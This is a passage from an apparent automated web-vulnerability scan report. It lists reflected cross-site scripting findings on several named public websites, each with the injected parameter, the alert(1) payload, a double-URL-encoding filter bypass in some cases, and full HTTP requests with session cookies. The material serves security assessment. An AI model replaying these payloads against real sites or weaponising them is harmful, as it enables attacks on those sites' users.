GET /FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx?Alias=www.fusionvm73dfb"-alert(1)-"905ea5234ca&TabId=0&Lang=en-US&OU=0&ItemId=35715 HTTP/1.1 Host: www.fusionvm.com Connection: keep-alive Referer: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA; CriticalWatch_WinMgmt=ee7a5594-6305-4caf-8e32-75811cf5c202; ASP.NET_SessionId=5nwmhdis5hnjwmmysd3y3vr0
The value of the Lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd6ec"-alert(1)-"99c3d54552a was submitted in the Lang parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx?Alias=www.fusionvm&TabId=0&Lang=en-USfd6ec"-alert(1)-"99c3d54552a&OU=0&ItemId=35715 HTTP/1.1 Host: www.fusionvm.com Connection: keep-alive Referer: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA; CriticalWatch_WinMgmt=ee7a5594-6305-4caf-8e32-75811cf5c202; ASP.NET_SessionId=5nwmhdis5hnjwmmysd3y3vr0
5.223. http://www.magellangps.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.magellangps.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bb4e2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272dba5efe1c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bb4e2'style='x:expression(alert(1))'2dba5efe1c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /?bb4e2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272dba5efe1c7=1 HTTP/1.1 Host: www.magellangps.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
5.224. http://www.magellangps.com/s.nl [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.magellangps.com
Path: /s.nl
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 14994%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d346e0b5a0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 14994'style='x:expression(alert(1))'d346e0b5a0f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 296c5"><script>alert(1)</script>422230dfc64 was submitted in the loc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/feedback/feedback.php?loc=http://www.randomhouse.com/296c5"><script>alert(1)</script>422230dfc64 HTTP/1.1 Host: www.randomhouse.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]
<html> <head> <title>Feedback for RandomHouse.com</title> <style type="text/css"> body { width: 500px; padding: 0; margin: 0; } #comments { background-color: #ddd; font-family: verdana, ar ...[SNIP]... <input type="hidden" name="referer" value="http://www.randomhouse.com/296c5"><script>alert(1)</script>422230dfc64"> ...[SNIP]...
5.226. http://www.randomhouse.com/cgi-bin/feedback/feedback.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.randomhouse.com
Path: /cgi-bin/feedback/feedback.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5a11"><script>alert(1)</script>06c74c5b53b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/feedback/feedback.php?loc=http://www.randomhouse.com/&b5a11"><script>alert(1)</script>06c74c5b53b=1 HTTP/1.1 Host: www.randomhouse.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]
The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 783b4<img%20src%3da%20onerror%3dalert(1)>1d40facd3aa was submitted in the cb parameter. This input was echoed as 783b4<img src=a onerror=alert(1)>1d40facd3aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /ws/r2/Resonance.aspx?appid=randomhouse01&tk=686529694590717&ss=212207240983843&sg=1&pg=447216360829770&bx=true&vr=2.69&sc=cart_rr&ev=cart+display&ei=&ct=randomhousec01&no=4&cb=r1eh783b4<img%20src%3da%20onerror%3dalert(1)>1d40facd3aa&clk=&ur=http%3A//ecommerce.randomhouse.com/cart.do%3Ffrom%3Drandomhouse&plk=&rf= HTTP/1.1 Host: www.res-x.com Proxy-Connection: keep-alive Referer: http://ecommerce.randomhouse.com/cart.do?from=randomhouse User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=sy5xib45fjd4zxyswg3jzv45; NSC_wjq-Hspvq4=ffffffffc3a01e5345525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET P3P: CP="NOI DSP COR CUR PSA PSD OUR IND UNI" Date: Tue, 26 Apr 2011 22:09:46 GMT Content-Length: 2565
The value of the sc request parameter is copied into the HTML document as plain text between tags. The payload fe0e1<img%20src%3da%20onerror%3dalert(1)>1096c836d61 was submitted in the sc parameter. This input was echoed as fe0e1<img src=a onerror=alert(1)>1096c836d61 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /ws/r2/Resonance.aspx?appid=randomhouse01&tk=686529694590717&ss=212207240983843&sg=1&pg=447216360829770&bx=true&vr=2.69&sc=cart_rrfe0e1<img%20src%3da%20onerror%3dalert(1)>1096c836d61&ev=cart+display&ei=&ct=randomhousec01&no=4&cb=r1eh&clk=&ur=http%3A//ecommerce.randomhouse.com/cart.do%3Ffrom%3Drandomhouse&plk=&rf= HTTP/1.1 Host: www.res-x.com Proxy-Connection: keep-alive Referer: http://ecommerce.randomhouse.com/cart.do?from=randomhouse User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=sy5xib45fjd4zxyswg3jzv45; NSC_wjq-Hspvq4=ffffffffc3a01e5345525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET P3P: CP="NOI DSP COR CUR PSA PSD OUR IND UNI" Date: Tue, 26 Apr 2011 22:08:44 GMT Content-Length: 137
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 21e7b<img%20src%3da%20onerror%3dalert(1)>106cbf3251 was submitted in the REST URL parameter 2. This input was echoed as 21e7b<img src=a onerror=alert(1)>106cbf3251 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /CatalogFeed/Stats21e7b<img%20src%3da%20onerror%3dalert(1)>106cbf3251?callback=frontDoorStats HTTP/1.1 Host: www.widgetbox.com Proxy-Connection: keep-alive Referer: http://www.widgetbox.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=7A8F0F509BDEAD90EE48E43F3C535E7F; node=1025; __utmz=94870938.1303854385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=94870938.1634222741.1303854385.1303854385.1303854385.1; __utmc=94870938; __utmb=94870938.2.10.1303854385
Response
HTTP/1.0 200 OK Date: Tue, 26 Apr 2011 21:46:28 GMT Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Set-Cookie: node=1025; path=/ Connection: close Content-Type: text/javascript
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 87793<script>alert(1)</script>1ab895c59aa was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /CatalogFeed/Stats?callback=frontDoorStats87793<script>alert(1)</script>1ab895c59aa HTTP/1.1 Host: www.widgetbox.com Proxy-Connection: keep-alive Referer: http://www.widgetbox.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=7A8F0F509BDEAD90EE48E43F3C535E7F; node=1025; __utmz=94870938.1303854385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=94870938.1634222741.1303854385.1303854385.1303854385.1; __utmc=94870938; __utmb=94870938.2.10.1303854385
Response
HTTP/1.0 200 OK Date: Tue, 26 Apr 2011 21:46:17 GMT Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Set-Cookie: node=1025; path=/ Connection: close Content-Type: text/javascript
The value of the lib.mobileCssSrc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c95c"><script>alert(1)</script>87c8ce80013687705 was submitted in the lib.mobileCssSrc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe?widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile%20Web%20App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0%20%28windows%3B%20u%3B%20windows%20nt%206.1%3B%20en-us%29%20applewebkit%2F534.16%20%28khtml%2C%20like%20gecko%29%20chrome%2F10.0.648.205%20safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830&siteConfig=%7B%22icon%22%3A%22%22%2C%22phoneIcon%22%3A%22%22%2C%22tabletIcon%22%3A%22%22%2C%22startupImg%22%3A%22%22%2C%22tabletStartupImg%22%3A%22%22%2C%22headerImg%22%3A%22%22%2C%22navStyle%22%3A%22bottomNav%22%2C%22aboutImg%22%3A%22%22%2C%22aboutText%22%3A%22Made+with+Widgetbox+Mobile.%22%2C%22titleStyle%22%3A%22siteTitleText%22%2C%22titleImg%3A%22%3A%22%22%2C%22themeColor%22%3A%22%22%2C%22theme%22%3A%2201%22%2C%22themeGuid%22%3A%226f55c53b-4089-4776-bcb9-135b52609c75%22%2C%22font%22%3A%7B%22primary%22%3A%22sans-serif%22%2C%22secondary%22%3A%22sans-serif%22%2C%22titleColor%22%3A%22%22%2C%22primaryColor%22%3A%22%22%2C%22secondaryColor%22%3A%22%22%2C%22title%22%3A%22sans-serif%22%7D%2C%22admobAcct%22%3A%22%22%2C%22showAds%22%3A%22false%22%2C%22showInstallTip%22%3A%22true%22%2C%22pageConfigs%22%3A%5B%5D%2C%22themeImage%22%3A%22%22%7D&vars=&lib.mobileCssSrc=%2Fmobile%2Fx%2Fcss%2Fpreview.css2c95c"><script>alert(1)</script>87c8ce800
13687705&wbxPagePath=&pages=%5B%5D&isInstallable=true&pageIds=%5B%5D&wbxPageTitle=New+App&lib.mobileScriptSrc=%2Fmobilejs%2Fmapp_future.js&wbx_in_editor=%5Bobject+Object%5D&__cb=1303854400438&widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile+Web+App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0+%28windows%3B+u%3B+windows+nt+6.1%3B+en-us%29+applewebkit%2F534.16+%28khtml%2C+like+gecko%29+chrome%2F10.0.648.205+safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830 HTTP/1.1 Host: www.widgetserver.com Proxy-Connection: keep-alive Cache-Control: max-age=0 Origin: http://www.widgetbox.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 21:48:23 GMT Server: Apache/2.2.3 (Red Hat) Expires: Sun, 7 May 1995 12:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache X-UA-Compatible: chrome=1 Vary: Accept-Encoding P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 15165
The value of the lib.mobileScriptSrc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a27f"><script>alert(1)</script>6e298833ab3d61a5d was submitted in the lib.mobileScriptSrc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe?widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile%20Web%20App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0%20%28windows%3B%20u%3B%20windows%20nt%206.1%3B%20en-us%29%20applewebkit%2F534.16%20%28khtml%2C%20like%20gecko%29%20chrome%2F10.0.648.205%20safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830&siteConfig=%7B%22icon%22%3A%22%22%2C%22phoneIcon%22%3A%22%22%2C%22tabletIcon%22%3A%22%22%2C%22startupImg%22%3A%22%22%2C%22tabletStartupImg%22%3A%22%22%2C%22headerImg%22%3A%22%22%2C%22navStyle%22%3A%22bottomNav%22%2C%22aboutImg%22%3A%22%22%2C%22aboutText%22%3A%22Made+with+Widgetbox+Mobile.%22%2C%22titleStyle%22%3A%22siteTitleText%22%2C%22titleImg%3A%22%3A%22%22%2C%22themeColor%22%3A%22%22%2C%22theme%22%3A%2201%22%2C%22themeGuid%22%3A%226f55c53b-4089-4776-bcb9-135b52609c75%22%2C%22font%22%3A%7B%22primary%22%3A%22sans-serif%22%2C%22secondary%22%3A%22sans-serif%22%2C%22titleColor%22%3A%22%22%2C%22primaryColor%22%3A%22%22%2C%22secondaryColor%22%3A%22%22%2C%22title%22%3A%22sans-serif%22%7D%2C%22admobAcct%22%3A%22%22%2C%22showAds%22%3A%22false%22%2C%22showInstallTip%22%3A%22true%22%2C%22pageConfigs%22%3A%5B%5D%2C%22themeImage%22%3A%22%22%7D&vars=&lib.mobileCssSrc=%2Fmobile%2Fx%2Fcss%2Fpreview.css&wbxPagePath=&pages=%5B%5D&isInstallable=
true&pageIds=%5B%5D&wbxPageTitle=New+App&lib.mobileScriptSrc=%2Fmobilejs%2Fmapp_future.js1a27f"><script>alert(1)</script>6e298833ab3d61a5d&wbx_in_editor=%5Bobject+Object%5D&__cb=1303854400438&widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile+Web+App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0+%28windows%3B+u%3B+windows+nt+6.1%3B+en-us%29+applewebkit%2F534.16+%28khtml%2C+like+gecko%29+chrome%2F10.0.648.205+safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830 HTTP/1.1 Host: www.widgetserver.com Proxy-Connection: keep-alive Cache-Control: max-age=0 Origin: http://www.widgetbox.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 21:48:30 GMT Server: Apache/2.2.3 (Red Hat) Expires: Sun, 7 May 1995 12:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache X-UA-Compatible: chrome=1 Vary: Accept-Encoding P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 15165
The value of the pages request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4dfe5%3balert(1)//bec5e8a4925e26aae was submitted in the pages parameter. This input was echoed as 4dfe5;alert(1)//bec5e8a4925e26aae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe?widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile%20Web%20App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0%20%28windows%3B%20u%3B%20windows%20nt%206.1%3B%20en-us%29%20applewebkit%2F534.16%20%28khtml%2C%20like%20gecko%29%20chrome%2F10.0.648.205%20safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830&siteConfig=%7B%22icon%22%3A%22%22%2C%22phoneIcon%22%3A%22%22%2C%22tabletIcon%22%3A%22%22%2C%22startupImg%22%3A%22%22%2C%22tabletStartupImg%22%3A%22%22%2C%22headerImg%22%3A%22%22%2C%22navStyle%22%3A%22bottomNav%22%2C%22aboutImg%22%3A%22%22%2C%22aboutText%22%3A%22Made+with+Widgetbox+Mobile.%22%2C%22titleStyle%22%3A%22siteTitleText%22%2C%22titleImg%3A%22%3A%22%22%2C%22themeColor%22%3A%22%22%2C%22theme%22%3A%2201%22%2C%22themeGuid%22%3A%226f55c53b-4089-4776-bcb9-135b52609c75%22%2C%22font%22%3A%7B%22primary%22%3A%22sans-serif%22%2C%22secondary%22%3A%22sans-serif%22%2C%22titleColor%22%3A%22%22%2C%22primaryColor%22%3A%22%22%2C%22secondaryColor%22%3A%22%22%2C%22title%22%3A%22sans-serif%22%7D%2C%22admobAcct%22%3A%22%22%2C%22showAds%22%3A%22false%22%2C%22showInstallTip%22%3A%22true%22%2C%22pageConfigs%22%3A%5B%5D%2C%22themeImage%22%3A%22%22%7D&vars=&lib.mobileCssSrc=%2Fmobile%2Fx%2Fcss%2Fpreview.css&wbxPagePath=&pages=%5B%5D4dfe5%3balert(1
)//bec5e8a4925e26aae&isInstallable=true&pageIds=%5B%5D&wbxPageTitle=New+App&lib.mobileScriptSrc=%2Fmobilejs%2Fmapp_future.js&wbx_in_editor=%5Bobject+Object%5D&__cb=1303854400438&widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile+Web+App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0+%28windows%3B+u%3B+windows+nt+6.1%3B+en-us%29+applewebkit%2F534.16+%28khtml%2C+like+gecko%29+chrome%2F10.0.648.205+safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830 HTTP/1.1 Host: www.widgetserver.com Proxy-Connection: keep-alive Cache-Control: max-age=0 Origin: http://www.widgetbox.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
